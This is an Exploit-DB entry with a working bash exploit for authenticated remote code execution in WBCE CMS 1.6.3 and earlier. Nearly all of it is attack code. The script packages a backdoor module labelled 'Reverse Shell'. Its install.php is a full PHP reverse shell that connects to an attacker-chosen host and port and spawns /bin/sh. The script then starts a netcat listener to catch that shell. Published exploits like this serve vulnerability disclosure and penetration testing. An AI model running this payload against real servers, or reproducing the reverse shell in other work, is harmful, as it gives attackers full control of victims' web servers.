WBCE CMS 1.6.3 - Authenticated Remote Code Execution (RCE)

EDB-ID:

52132

CVE:

N/A

EDB Verified:

Author:

Swammers8

Type:

webapps

Exploit:   /  

Platform:

Multiple

Date:

2025-04-06

Vulnerable App: 
# Exploit Title: WBCE CMS <= v1.6.3 Authenticated Remote Code Execution (RCE)
# Date: 3/22/2025
# Exploit Author: Swammers8
# Vendor Homepage: https://wbce-cms.org/
# Software Link: https://github.com/WBCE/WBCE_CMS
# Version: 1.6.3 and prior
# Tested on: Ubuntu 24.04.2 LTS
# YouTube Demonstration: https://youtu.be/Dhg5gRe9Dzs?si=-WQoiWU1yqvYNz1e
# Github: https://github.com/Swammers8/WBCE-v1.6.3-Authenticated-RCE

#!/bin/bash

# Make a zip file exploit
# Start netcat listener

if [[ $# -ne 2 ]]; then
	echo "[*] Description:"
	echo "[*] This is an Authenticated RCE exploit for WBCE CMS version <= 1.6.3"
	echo "[*] It will create an infected module .zip file and start a netcat listener."
	echo "[*] Once the zip is created, you will have to login to the admin page"
	echo "[*] to upload and install the module, which will immediately run the shell"
	echo "[*] Shell taken from: https://github.com/pentestmonkey/php-reverse-shell/tree/master"
	echo "[!] Usage:"
	echo "[*] $0 <lhost> <lport>"
	exit 1
fi

if [ -z "$(which nc)" ]; then
	echo "[!] Netcat is not installed."
	exit 1 
fi

ip=$1
port=$2

rm -rf shellModule.zip
rm -rf shellModule
mkdir shellModule

echo [*] Crafting Payload

cat <<EOF > shellModule/info.php
<?php
/**
 *
 * @category        modules
 * @package         Reverse Shell
 * @author          Swammers8
 * @link                        https://swammers8.github.io/
 * @license         http://www.gnu.org/licenses/gpl.html
 * @platform        example.com
 * @requirements    PHP 5.6 and higher
 * @version         1.3.3.7
 * @lastmodified    May 22 2025
 *
 *
 */

\$module_directory               = 'modshell';
\$module_name                    = 'Reverse Shell';
\$module_function                = 'page';
\$module_version                 = '1.3.3.7';
\$module_platform                = '2.10.x';

\$module_author                  = 'Swammers8';
\$module_license                 = 'GNU General Public License';
\$module_description     = 'This module is a backdoor';

?>
EOF

cat <<EOF > shellModule/install.php
<?php
set_time_limit (0);
\$VERSION = "1.0";
\$ip = '$ip';  // CHANGE THIS
\$port = $port;       // CHANGE THIS
\$chunk_size = 1400;
\$write_a = null;
\$error_a = null;
\$shell = 'uname -a; w; id; /bin/sh -i';
\$daemon = 0;
\$debug = 0;

if (function_exists('pcntl_fork')) {
	\$pid = pcntl_fork();
	if (\$pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if (\$pid) {
		exit(0);  // Parent exits
	}

	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	\$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);


\$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30);
if (!\$sock) {
	printit("\$errstr (\$errno)");
	exit(1);
}

\$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

\$process = proc_open(\$shell, \$descriptorspec, \$pipes);

if (!is_resource(\$process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

stream_set_blocking(\$pipes[0], 0);
stream_set_blocking(\$pipes[1], 0);
stream_set_blocking(\$pipes[2], 0);
stream_set_blocking(\$sock, 0);

printit("Successfully opened reverse shell to \$ip:\$port");

while (1) {
	if (feof(\$sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	if (feof(\$pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	\$read_a = array(\$sock, \$pipes[1], \$pipes[2]);
	\$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);

	if (in_array(\$sock, \$read_a)) {
		if (\$debug) printit("SOCK READ");
		\$input = fread(\$sock, \$chunk_size);
		if (\$debug) printit("SOCK: \$input");
		fwrite(\$pipes[0], \$input);
	}

	if (in_array(\$pipes[1], \$read_a)) {
		if (\$debug) printit("STDOUT READ");
		\$input = fread(\$pipes[1], \$chunk_size);
		if (\$debug) printit("STDOUT: \$input");
		fwrite(\$sock, \$input);
	}

	if (in_array(\$pipes[2], \$read_a)) {
		if (\$debug) printit("STDERR READ");
		\$input = fread(\$pipes[2], \$chunk_size);
		if (\$debug) printit("STDERR: \$input");
		fwrite(\$sock, \$input);
	}
}

fclose(\$sock);
fclose(\$pipes[0]);
fclose(\$pipes[1]);
fclose(\$pipes[2]);
proc_close(\$process);

function printit (\$string) {
	if (!\$daemon) {
		print "\$string\n";
	}
}

?> 
EOF

echo [*] Zipping to shellModule.zip
zip -r shellModule.zip shellModule
rm -rf shellModule
echo [*] Please login to the WBCE admin panel to upload and install the module
echo [*] Starting listener

nc -lvnp $port

echo
echo
echo "[*] Done!"
echo "[*] Make sure to uninstall the module named 'Reverse Shell' in the module page"
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services